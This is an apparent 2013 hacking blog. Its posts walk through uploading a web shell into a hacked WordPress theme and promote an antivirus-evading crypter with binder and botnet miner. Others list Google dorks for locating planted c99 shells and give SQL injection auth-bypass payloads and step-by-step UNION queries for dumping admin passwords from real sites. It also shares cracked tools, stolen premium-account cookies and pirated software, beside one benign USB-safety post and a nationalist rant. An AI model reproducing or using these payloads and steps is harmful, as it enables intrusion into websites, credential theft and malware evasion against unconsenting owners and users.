Pages

Thursday, January 24, 2013

BRUTE FORCE ATTACK SOFTWARE : BRUTEFORCER



BruteForcer is a client-server multithreaded application for bruteforce cracking passwords. The more clients connected to the server, the faster the cracking. The client is plugin-based. Meaning that BruteForcer itself is just a segmentation software and it doesn't care what type of file you are trying to crack. It just sends the generated passwords to the plugin and the plugin will handle checking if the password is correct. 

Download here:  

http://www.mediafire.com/download.php?ycniytheotw

Backtrack Hacking Tutorials


Backtrack DVD Tutorials | 2.97 GB
Genre: eleaning
Language: English
Contents:
Episode 3 - Wireless Hacking - DeAuth
Episode 5 - Lock Picking - Bump Key
Episode 6 - Phone Phreaking - Beige Box
Episode 7 - Phone Phreaking / Network Hacking - Sniffing VOIP
Episode 8 - Lock Picking - DIY Padlock Shims
Episode 9 - Lock Picking - Mult-Disc Combo Locks
Episode 1910 - Hacking Basics - MD5
Episode 1920 - Ettercap
Episode 21 - XSS Tunnel
Episode 22 - Playstation 2 Softmod
Episode 23 - Cracking WEP Update
Episode 24 - Bypass Hotspot's Access Controls
Underground - Install Backtrack 3 on USB
Underground - CSRF (Cross Site Request Forgery)
Underground - Alternate Data Streams
Underground - Local File Inclusion
Underground - Windows Privilege Escalation
Underground - Bluetooth Hacking
Underground - VMWare
Underground - Fix Google Mail Enumerator
Underground - Home Made Lock Picks
Underground - Downfalls of Anti-Virus Software Part 2
Underground - Downfalls of Anti-Virus Software
Underground - Evilgrade
Underground - Trojan Basics
Underground - Manipulating Windows User Accounts
Underground - Combine Files
Underground - Password Phishing
Underground - Windows SMB Relay Exploit
Underground - Application Patching
Underground - Metasploit Autopwn
Underground - Email Spoofing
Underground - Introduction
Extracting Database Information from Information_Schema
FPGA MD5 Cracker
Arduino ARP Cop
Email Injection
Ping of Death
DNS Spoofing with Virtual Hosts
Bypass Cisco Clean Access & Cisco NAC Appliance
Dual Boot - Windows & Backtrack
Sql Injection Challenge How-to
How to use Intel Pro / Wireless 3945ABG in Backtrack 2
Local Privilege Escalation Vulnerability in Cisco VPN Client

Tuesday, January 22, 2013

How to Shell Upl0ading In Wordress










Wordperss Site + Username+ Password
Madspot Security Team Shell

1) Login To y0ur hacked WordpREss SiTe...

2) nOw gOt0 Theme Editor..
   --- wp-admin/theme-editor.php

3) On y0ur Right Side..Choose 404.php

4) Edit it And Paste Y0ur Madspot Shell Code in 404.php nd Save !t..

5) Now, you will see some thing like :
---- /home/Themename/public_html/wp-content/themes/themename/404.php&theme=themename&a=te&scrollto=0

6) Now Delete every thing before /wp-content/ and every thing after 404.php....

7) URl will be www.site.com/wp-content/themes/themename/404.php

7) Now Press Enter and Shell Execute ;)

AIO FUD CRYPTER 2012 - BYPASS ANTIVIRUS DETECTION


Crypter is free software used to hide our viruses, RATs or any keylogger from antiviruses so that they are not detected and deleted by antiviruses. Thus, a crypter is a program that allow users to crypt the source code of their program. Generally, antivirus work by splitting source code of application and then search for certain string within source code.

If antivirus detects any certain malicious strings, it either stops scan or deletes the file as virus from system.

It also provides some more features like Binding, Icon Changing, Spoofing the extension of a files, Generate a downloader, Encrypt your files to FUD, Making money with this tool from your bots using the Bitcoin Miner and much more !!

Follow The Following Steps :


First Download the Free AIO FUD Crypter from Here and 


install it into your computer,

Binder to bind (combine) any other .exe file with your crypted file..

Spoofer to chance the extension of keylog or virus file..

Features:
  • FUD 0/37 Crypter
  • FUD 0/37 Binder
  • FUD 0/37 Botnet Bitcoin Miner
  • Extension Spoofer
  • Obfuscator
  • Icon Changer
  • Downloader
  • Auto Updates
  • More to come!

Enjoy FUD Crypter to bypass antivirus detection...

Top 5 Security Tips To Protect Your Computer From Viruses


Top 5 Security Tips To Protect Your Computer From USB Viruses

With increasing anti-virus security in place against email-aware viruses and malware, hackers are turning their attention to less well-defended routes such as USB drives. This is the latest method that’s used by hackers to torment innocent users. However, there are ways you can protect your computer from USB and Pen drive viruses.


1.Block USB Viruses
Invest in an excellent anti-virus program that has built in USB virus scan and remover. These anti-USB virus scan programs not only protect your computer from USB Autorun viruses but can also clean worms, Trojans and viruses in your USB memory sticks.You can try anti-virus programs for USB virus such as USB Virus Scan, USB Drive Antivirus and so on.


2.Disable Your Computer’s Autorun Feature


When you plug in a USB drive stick into your system, the Autorun feature initiates automatically. If your USB contains any virus programs, it’ll use the Autorun feature to infect your computer. To protect your computer, disable the Autorun feature.You can disable the Autorun feature via the Control Panel.
Alternatively, you can use antivirus software to disable and enable the Autorun feature whenever you want. Additionally, these USB blocking softwares allow system administrators to specify which removable storage drives users can access.


3.Update Your Device Driver

Keeping your USB device driver updated is a good way to ensure greater stability for your USB drives. While this won’t help eradicate USB viruses, USB device drivers are constantly updated to block viruses and deliver timely warnings. You can update your USB device drive from your Windows Computer Management feature in the Control Panel.


4.Use USB Firewall Software

USB firewalls prevent Windows OS from processing malicious programs when a virus infected portable USB device is opened. USB firewalls monitor only your USB devices, and not your CD and DVD drives. By using USB firewalls, you’ll be enabling a basic level of protection from the autorun.inf viruses that spread from portable USB devices.


5.Always Safely Remove USB Devices

Viruses are sometimes created via damaged documents. If you are transferring a set of files to your USB drive, make sure the transfer is complete before you eject the device. Always use the Safely Remove Hardware feature of Windows OS. This is because partially transferred or damaged files can in turn corrupt other files on your USB drive.. 

Must Pass Ur Comments Ur,s Comments Will be Always Welcome :)

Sunday, January 20, 2013

Aman Ki Asha Truth...


see this video see how Non-Muslims are planing and doing against our Beloved country PAKISTAN....
this is must for all pakistanis to see this video
if u think u r true Pakistani then it iz your Responsibility to see who are against and what they are doing against your country Pakistan

PAKISTAN ZINDABAD!!!!!


click here for the video...


Note : When the link is open on the right top of the page click on skip to see the video..

Tuesday, January 8, 2013

Premium accounts updated....

premium accounts updated by CyB3r @nG3L
if still none work tell me i will update more...




http://adf.ly/H4d1z

How to use premium cookies

Hello... User.. Most of u don't Know.. How To Use Premium Cookies.... So Today We Are Gonna Explain Step by Step 
How To Use Premium Cookies.. 



  • Copy The Java - Script


  • Paste In On Firefox/Google Chrome URL Box

  • Bookmark It ( Ctrl + D For Google Chrome  )

  • Now Go to Ur Desired Site ( Ex : Extabit.com 

  • Click On Previous saved Bookmarked

  • A Dialogue Will Appear Saying Insert Ur Cookie Here

  • Insert/Paste Ur Cookie

  • Then Click On OK Button

  • Then Page Will Refresh ND Uhhla... You've Got Ur Premium Account

Havij v1.16 portable cracked


One of the most preferred and widely used SQL-injector Havij has released another updated version (v1.16). In the middle of last year ITSec Team made Havij 1.15 available, so after one year of hard work now we got the next edition of this marvellous SQL-i tool. As per survey Havij is listed as one of the finest and widely used tool used for finding SQL Injection vulnerabilities on a web page. It has been thoroughly used by hackers along with penetration testers over the whole spectrum. 

Brief About Havij :- It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and  password hashes, dump tables and columns, fetching data from the database, running SQL  statements and even accessing the underlying file system and executing commands on the  operating system. The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injectiong vulnerable targets using Havij. The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users.

New Features :-

  •     Multithreading

  •     Oracle Blind injection method.

  •     Automatic all parameter scan added.

  •     New blind injection method (no more ? char.)

  •     Retry for blind injection.

  •     A new method for tables/columns extraction in mssql blind.

  •     A WAF bypass method for mysql blind.

  •     Getting tables and columns even when can not get current database.

  •     Auto save log.


Bug Fixed:- 

  •     url encode bug fixed.

  •     Trying time based methods when mssql error based and union based fail.

  •     Clicking get columns would delete all tables.

  •     Reseting time based method delay when applying settings.

  •     Oracle and PostgreSQL detection

download

http://postimage.org/image/4lrar0myv/

How to search SHELLS using Dorks

THANKZZZ TO Tiger m@te
"uname -a","uid=","drwxr-xr-x","r57shell"
safe-mode: off (not secure) drwxrwxrwx c99shell
inurl:c99.php
inurl:c99.php uid=0(root)
root c99.php
"Captain Crunch Security Team" inurl:c99

download c99.php
inurl:c99.php
inurl:"/c99.php"
inurl:"c99.php" c99shell
inurl:c99.php uid=0(root)
c99shell powered by admin
c99 shell v.1.0 (roots)
inurl:c99.php
allintitle: "c99shell"
intitle:C99Shell v. 1.0 pre-release +uname
intitle:C99Shell v. 1.0 pre-release +uname
inurl:/c99.php+uname
c99shell [file on secure ok ]?
powered by Captain Crunch Security Team
"c99.php" filetype:php
"inurl:c99.php"
c99. PHP-code Feedback Self remove
c99shell
intitle:C99Shell v. 1.0 pre-release +uname
safe-mode: off (not secure) drwxrwxrwx c99shell
c99.php download
c99shell filetype:php -echo
c99shell powered by admin
inurl:c99.php uid=0(root)
C99Shell v. 1.0 pre-release build #5
--[ c99shell v. 1.0 pre-release build #16
c99shell linux infong
C99Shell v. 1.0 pre-release build
!C99Shell v. 1.0 beta!
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove
!c99shell v. 1+Safe-mode: OFF (not secure)
"C99Shell v. 1.0 pre-release build "
intitle:c99shell +filetype:php
intitle:C99Shell v. 1.0 pre-release +uname
"Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
intitle:!C99Shell v. 1.0 pre-release build #16! root
intitle:c99shell intext:uname
allintext:C99Shell v. 1.0 pre-release build #12
c99shell v. 1.0 pre-release build #16
--[ c99shell v. 1.0 pre-release build #15 | Powered by ]--
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
"c99shell v 1.0"
ftp apache inurl:c99.php
c99shell+v.+1.0 16
C99Shell v. 1.0 pre-release build #16 download
intitle:c99shell "Software: Apache"
allintext: Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove
powered by Captain Crunch Security Team
powered by Captain Crunch Security Team
!C99Shell v. 1.0 pre-release build #5!
c99shell v. 1.0 release security
c99shell v. 1.0 pre-release build
c99shell [file on secure ok ]?
C99Shell v. 1.3
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
powered by Captain Crunch Security Team
C99Shell v. 1.0 pre-release build #16
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
inurl:c99.php
"C99Shell v. 1.0 pre"
=C99Shell v. 1.0 pre-release
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
c99shell v. pre-release build
powered by Captain Crunch Security Team
!C99Shell v. 1.0 pre-release build #5!
intitle:"c99shell" filetype:php root
intitle:"c99shell" Linux infong 2.4
C99Shell v. 1.0 beta !
C99Shell v. 1.0 pre-release build #
allintext:C99Shell v. 1.0 pre-release build #12
"C99Shell v. 1.0 pre"
powered by Captain Crunch Security Team
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
intitle:C99Shell pre-release
powered by Captain Crunch Security Team
C99Shell v. 1.0 pre-release build #16!
C99Shell v. 1.0 pre-release build #16 administrator
intitle:c99shell filetype:php
C99Shell v. 1.0 pre-release build #12
c99shell v.1.0
"c99shell v. 1.0 pre-release build"
inurl:"c99.php" filetype:php
"c99shell v. 1.0 "
ok c99.php
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
c99shell v. 1.0 pre-release build #16 |
!C99Shell v. 1.0 pre-release build #5! 

Bypass admin acc (asp)

Gaining auth bypass on an admin account.
Most sites vulnerable to this are .asp
First we need 2 find a site, start by opening google.
Now we type our dork: "defenition of dork" 'a search entry for a certain type of site/exploit .ect"
There is a large number of google dork for basic sql injection.
here is the best:
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"


Now what to do once we get to our site.
the site should look something like this :

welcome to xxxxxxxxxx administrator panel
username :
password :

so what we do here is in the username we always type "Admin"
and for our password we type our sql injection

here is a list of sql injections

' or '1'='1
' or 'x'='x
' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --
'or'1=1'


there are many more but these are the best ones that i know of
and what this sql injection is doing : confusing the fuck out of the database till it gives you auth bypass.

So your input should look like this

username:Admin
password:'or'1'='1

So click submit and you'r in
NOTE not all sites are vulnerable.


part 2: injecting sql queries to extract the admin username and password

ok so lets say we have a site :
http://www.xxxxx.com/index.php?catid=1
there is a list of dork 4 sites lyk this

"inurl:index.php?catid="
"inurl:news.php?catid="
"inurl:index.php?id="
"inurl:news.php?id="
or the best in my view "full credit to qabandi for discovering this"
"inurl:".php?catid=" site:xxx"


So once you have you'r site
http://www.xxxx.com/index.php?catid=1
now we add a ' to the end of the url
so the site is
http://www.xxxx.com/index.php?catid=1'
if there is an error of some sort then it is vulnerable
now we need to find the number of columns in the sql database
so we type
http://www.xxxx.com/index.php?catid=1 order by 1-- "no error"
http://www.xxxx.com/index.php?catid=1 order by 2-- "no error"
http://www.xxxx.com/index.php?catid=1 order by 3-- "no error"
http://www.xxxx.com/index.php?catid=1 order by 4-- "no error"
http://www.xxxx.com/index.php?catid=1 order by 5-- "error"

so this database has 4 columns because we got an error on 5
on some databases there is 2 columns and on some 200 it varies
so once we have the column number.
we try the union function
http://www.xxxx.com/index.php?catid=1 union select 1,2,3,4-- "or whatever number of columns are in the database"
if you see some numbers like 1 2 3 4 on the screen or the column names
it might not show all numbers on the screen but the numbers displayed are the ones you can replace to extract info from the db
so now we need to info about the db
so lets say the numbers 2 and 4 showed up on the screen
so i will use my query on 2
http://www.xxxx.com/index.php?catid=1 union select 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--
the db type and version will pop up on the screen
if the db version is 4 or lower then to extract the password you will need these queries
http://www.xxxx.com/index.php?catid=-1 UNION SELECT 1,concat(table_name,CHAR(58),column_name,CHAR(58),table_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37),3,4--
this should display the table containing the admin username and password
but if not then you will have to guess the table
so once you have your table "or not"
then type
http://www.xxxx.com/index.php?catid=1 UNION SELECT 1,password,3,4 FROM admintablename--
where it says admintablename type the table you found with concat(table_name,CHAR(58),column_name,CHAR(58),table_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37)-- or your guess
then once u have the right table name you should get the administrator password
then just do the same thing but type username instead of password
sometimes the password is hashed and you need to crack it.
then see if you can get the admin panel if you cant then try the admin panel finder script here http://www.darkc0de.com/c0de/perl/admin_1.2_.txt
now if the database is version 5 or up
type
http://www.xxxx.com/index.php?catid=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
and that will display a list of all the tables
once you have your table name
type the same thing as 4
http://www.xxxx.com/index.php?catid=1 UNION SELECT 1,password,3,4 FROM admintable--
then the same with username
but now if it doesnt work far all those things
just tootoo around with all the little catid=1 or catid=-1 or instead of -- put /* or even nothing
just play around with those
but sometimes we also need to use the version() or version@@
so sometimes UNION SELECT version (),password,3,4 FROM admintable--
or UNION SELECT version @@,password,3,4 FROM admintable--

Hack websites with HTML coding


If you have the HTML and JavaScript knowledge then you can access password protected websites. So you want to know how...Keep reading... 

Steps
1.
Open the website you want to hack. Provide wrong username-password in its log in form. (e.g. : Username : me and Password: ' or 1=1 --)An error will occur saying wrong username-password. Now be prepared your experiment starts from here...



2.
Right click anywhere on that error page =>> go to view source.
3.
There you can see the HTML coding with java scripts.• There you find somewhat like this....<_form action="...Login....">• Before this login information copy the URL of the site in which you are. (e.g. :"< _form..........action=http://www.targetwebsite.com/login.......>")
4.
Then delete the JavaScript from the above that validates your information in the server.(Do this very carefully, your success to hack the site depends upon this i.e. how efficiently you delete the java scripts that validate your account information)
5. 
Then take a close look for "<_input name="password" type="password">"[without quotes] -> replace "<_type=text> “there instead of "<_type=password>". See there if maximum length of password is less than 11 then increase it to 11 (e.g. : if then write )
6. 
Just go to file => save as and save it anywhere in your hard disk with ext.html(e.g.: c:\chan.html)
7. 
Reopen your target web page by double clicking 'chan.html' file that you saved in your hard disk earlier.• You see that some changes in current page as compared to original One. Don't get worried.
8. 
Provide any username [e.g.: hacker] and password [e.g.:' or 1=1 --] You have successfully cracked the above website and entered into the account of List user saved in the server's database.
Tips
• Please read "_form"="form" & "_type"="type" & "_input"="input" without quotes.
• The above trick won't work on the websites using latest technique to protect their servers. Still you may find some websites to use this trick.
Warnings
• Do the coding and changes very carefully, your success to hack the site depends upon this i.e. how efficiently you delete the java scripts that validate your account information.

porn attack your frend...

This summary is not available. Please click here to view the post.

Remove Rar password Sooo Easily....


Hello Guys, I'm here with another tutorial about "How to remove password protect from WinRAR files"

I tested this and works fine, If you want to test it - Process with below steps Grin

Step 01:

Go to OnlineConvert Website here: archive.online-convert.com/convert-to-zip

Step 02:

Then you can upload form like below picture

http://i48.tinypic.com/15pigsh.png

Upload your password protected WinRAR file to it

Step 03:

Wait some seconds and You will redirect to new page there is message like this

http://i50.tinypic.com/vgmrt3.png

Step 04:

Click on download link and Download your new RAR file

Enjoy Bye

How to know who always visit your FB Profile

Today am will teach you how to know who always visit you Facebook Account Profile. It is BUG in Facbook....

Step 1
Login To Your Facebook Account

Step 2
Do " CTRL+U " or " Right Click and View Source Page "

Step 3
Do " CTRL + F "

Step 4
Paste "InitialChatFriendsList" in the box search

Step 5
You will see " ["InitialChatFriendsList",[],{"list":["100001863531322","100002868264097", "

Step 6
The number show is ACCOUNT ID of your friends. If you want to know who the owner number Go to STEP 7

Step 7
Do " http://www.facebook.com/NUMBERID "

Step 8
Enjoy !!

Saturday, January 5, 2013

Sony Vegas Pro 11 Advanced Editing Software (cracked)




Sony Vegas Pro 11 Advanced Editing Software Review
Vegas Pro 11 is a welcome upgrade to this classic professional editing tool.
Some software upgrades are about flashy new interfaces and sexy new features, and others have more to do with supercharging the engine under the hood in order to boost the overall performance. This past year, video editing tools have been working on the flashy side with support for working with 3D video, but the real focus has continued to be on the machinery - taking advantage of today's 64-bit architectures to work efficiently with large clips in memory, combined with GPU (graphics processing unit) hardware to significantly speed up video processing.
We've seen this trend in Adobe Premiere Pro CS5, with the GPU-accelerated Mercury Playback Engine introduced last year, and with the application available only for 64-bit systems. Similarly, Vegas Pro 10 from Sony Creative Software was released last year with both 32-bit and 64-bit versions, and with GPU acceleration for rendering to AVC format.
Now Sony has released Vegas Pro 11, with full-up GPU acceleration for video processing, effects, and rendering, for speed ups across editing, playback, and output. Besides the under-the-hood improvements, the new Vegas also enhances editing with features including sync link, adds new technology including advanced video stabilization, and provides deeper support for editing 3D material including 3D Titler Pro.

GPU Acceleration

Integrating GPU acceleration into video editing software involves several trade-offs, balancing the number of video processing operations that are accelerated, the level of optimization for each effect, and the range of GPU processors and board hardware versions supported - all across different manufacturers, widely varying numbers of processors and associated on-board memory, and different functions available for acceleration.
Adobe's answer for Premiere Pro was to optimize for the NVIDIA line of graphics cards, taking advantage of the CUDA programming interface. With Vegas Pro 11, Sony has taken the approach of using the OpenCL (Open Computing Language) standard for parallel programming, to support a variety of GPU cards from both NVIDIA and AMD, with at least 512 MB of GPU memory. Sony's benchmarks show three to four times improvement in playback performance on mixed-format projects during editing compared to Vegas 10, and two to four times improvement in rendering the final output.
For video editing and playback, Sony reports that the Vegas 11 overhaul accelerates a substantial chunk of the built-in video processing, including crossfades, fades, alpha compositing, framerate resampling, time remapping, interlace processing, pan/crop, track motion, opacity, fade-to-color, and multicamera display. Plus it accelerates over 45 effects, transitions, generators and compositors -- with effects including gaussian blur, black and white, cookie cutter, bump map, mask generator, sepia, lens flare and chromakeyer, plus transitions such as cross effect, iris, and clock wipe.

Tech Specs

Trial Version Available: Yes - No Limitations
Operating System: Windows Vista or Windows 7, 32-bit or 64-bit
Minimum CPU: 2 GHz processor (multicore or multiprocessor CPU recommended for HD or stereoscopic 3D)
Minimum RAM: 2 GB (4 GB recommended)
Minimum Hard Drive Space for Installation: 500 MB
Capture Formats: (DV25, DV50, Analog Capture Cards, MicroMV, DVD Camcorders, HD Ready)
Batch Capture: Yes
Automatic Scene Detection: Yes
User Interface: Customizable, via dockable windows
Number of Video/Audio Tracks: Unlimited
Nesting Tracks: Yes
Audio/Video Level Envelopes: Yes. Volume/Pan/FX
Audio Scrub: Yes
Keyframe Animation: Yes
Number of Video Transitions: More than 200
Number of Video Filters: 58, plus nine via the inclusion of the NewBlue Titler Pro software; More than 390 effects
Background Rendering: Available via multiple instances of Vegas Pro 11 running simultaneously
Realtime Software Previews: Yes
Optimized for Dual Processor/HyperThreading: Yes
Third-party Plug-in Support: OpenFX-based plug-ins [GenArts, Boris FX, Red Giant, NewBlue FX, Imagineer Systems, Re:Vision, and more
Batch Render: Yes, via custom scripting or the Production Assistant 2.0 companion software
DVD Authoring Software Included: Yes, DVD Architect Pro 5.2
System Requirements: OHCI-compatible IEEE-1394DV card (for DV and HDV capture and print-to-tape), USB 2.0 connection (for importing from AVCHD, XDCAM EX, NXCAM, or DVD camcorders), Windows-compatible sound card, DVD-ROM drive (for installation from a DVD only), Supported CD-recordable drive (for CD burning only), Supported DVD-R/-RW/+R/+RW (for DVD burning only), Supported BD-R/-RE drive (for Blu-ray Disc burning only), Microsoft .NET Framework 3.5 SP1 (included on application disc), Apple QuickTime 7.1.6 or later for reading and writing QuickTime files, Internet Connection (for Gracenote MusicID Service), Supported NVIDIA or ATI cards for GPU-acceleration
NVIDIA: Requires a CUDA-enabled GPU and driver 270.xx or later with a GeForce GTX 4xx Series or higher GPU (or driver 285.62 or later with a GeForce GT 2xx Series or higher GPU).
AMD/ATI: Requires an OpenCL-enabled GPU and Catalyst driver 11.7 or later with a Radeon HD 57xx or higher GPU. If using a FirePro GPU, FirePro unified driver 8.85 or later is required.
Supported File Formats
DVD encoding, Video: NTSC 4:3, NTSC Widescreen, PAL 4:3, PAL Widescreen
DVD encoding, Audio: AC-3 5.1 or stereo, PCM
BD encoding, Video: MPEG-2 or AVC, 1080-60i, 1080-50i and 1080-24p
BD encoding, Audio: AC-3 5.1 or stereo, PCM


Plug-Ins / Stabilization

Another aspect of the Vegas Pro 11 retrofit was rebuilding the underlying architecture for video effects plug-ins based on the Open Effects Association platform. This new suspension provides an enhanced interface to allow third-party developers to more easily develop cool new Vegas plug-ins to better smooth your ride.
Sony also uses this platform for built-in tools, including the new advanced video stabilization plug-in, with high-performance shocks to reduce the jittery or shaky video caused by handheld recorders. The plug-in analyzes the motion within a clip on all three camera axes, so you can build on the presets to independently control the precision for pan smoothing (left/right), tilt (up/down) and zoom. It also provides rolling-shutter correction for the JELL-O/skew/wobble effects caused by some CMOS camcorders.

Sync Link

Within the passenger compartment, Vegas Pro 11 includes other enhancements for a more comfortable ride in your editing workflow, including adding a search box to effects windows (including a new compositors window) along with folders so you can more easily find and group plug-ins, and per-parameter keyframing for some effects and transitions. For audio, Sony also cleaned up the mixing console and simplified the master bus window.
But the major new editing feature in Vegas Pro 11 is sync link, a mechanism for keeping events aligned and synchronized across multiple tracks. Sometimes layered tracks are relatively independent, as with picture-in-picture, but other times you need to have secondary audio and B-roll video clips and titles that are tightly matched to the main track. With sync link, you can manually link one or more events on child tracks so that they automatically move together with the main event on the timeline. Meanwhile, you still can edit and adjust the child events independently.

3D Styling

3D is the flashy new feature for this year's generation of video tools, like a rear spoiler designed to add dimension to the car. Vegas Pro 11 has deepened its support for working with 3D material with stereoscopic 3D alignment and depth adjustment tools, floating window controls, and horizontal offset controls for 2D effects and transitions to adjust the perceived depth of effects. And Vegas Pro 11 supports NVIDIA 3D vision hardware to allow editing on single-display 3D computers, including Sony 3D desktops and laptops.
Then to detail your 3D production, Vegas Pro 11 also adds NewBlue Titler Pro for creating stereoscopic 3D titles with animations, professional-style templates, and effects, controlling text down to character level and on the X, Y, and Z axes.

Titlers

To further enhance your production vehicle, Vegas now supports a total of four different text titling plug-ins. You can use the basic text plug-in for simple text overlays, or move up to the new titles and text plug-in to create 2D animated effects. The improved ProType Titler provides more sophisticated animations, including scrolling and crawling credits, splined curves, and per-word and per-character animation. And there's NewBlue Titler Pro for 3D animated titles.

Rendering

When your trip is done and you are ready to render your project, Vegas Pro 11 has cleaned up the Render As dialog to provide more efficient selection of output format templates, based on the project settings, your favorites, or your own customized settings. Vegas Pro 11 helps with the profusion of formats by marking formats that match your project, providing text search options to match specific devices, and providing more filtering options to match specific video or audio attributes. Plus, you can now upload directly to YouTube.
The render formats now also include AVC/MP4 for Internet distribution, with support for progressive download from streaming servers. And Vegas Pro 11 also adds native import and editing of RAW photo files with the Microsoft Camera Codec Pack for Windows 7 and Windows Vista.

...Stays in Vegas

Sony Vegas Pro 11 is a classic and comfortable vehicle for video editing. Version 11 adds some nice refinements with the same comfortable feel, but the real action is under the hood with a significant turbo-boost from GPU acceleration that makes this a welcome upgrade. So download the trial version to kick the tires, and even download Sony's benchmark projects to see how they perform on your own system. Then put the pedal to the metal, or the mouse to the track.

get sony vegas full with tut under here..

Download here...